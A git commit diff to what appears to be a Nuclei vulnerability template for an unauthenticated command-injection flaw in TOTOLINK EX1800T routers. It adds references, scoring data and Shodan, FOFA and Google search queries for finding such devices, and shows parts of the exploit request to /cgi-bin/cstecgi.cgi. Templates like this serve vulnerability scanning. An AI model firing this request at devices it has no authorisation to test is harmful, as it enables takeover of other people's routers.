minor update
parent
fa81b8940a
commit
0a806d3dc4
|
@ -7,12 +7,18 @@ info:
|
|||
description: |
|
||||
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
|
||||
reference:
|
||||
- https://example.com/reference
|
||||
- https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
|
||||
- https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://github.com/20142995/nuclei-templates
|
||||
classification:
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.0926
|
||||
metadata:
|
||||
vendor: totolink
|
||||
product: a3700r_firmware
|
||||
shodan-query: http.title:"totolink"
|
||||
fofa-query: title="totolink"
|
||||
google-query: intitle:"totolink"
|
||||
tags: cve,cve2024,rce,unauth
|
||||
|
||||
variables:
|
||||
|
@ -24,7 +30,7 @@ http:
|
|||
POST /cgi-bin/cstecgi.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}/page/index.html?timestamp=1714114057910
|
||||
Referer: {{RootURL}}/page/index.html
|
||||
|
||||
{
|
||||
"token":"",
|
||||
|
@ -35,7 +41,6 @@ http:
|
|||
GET /{{file}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
Loading…
Reference in New Issue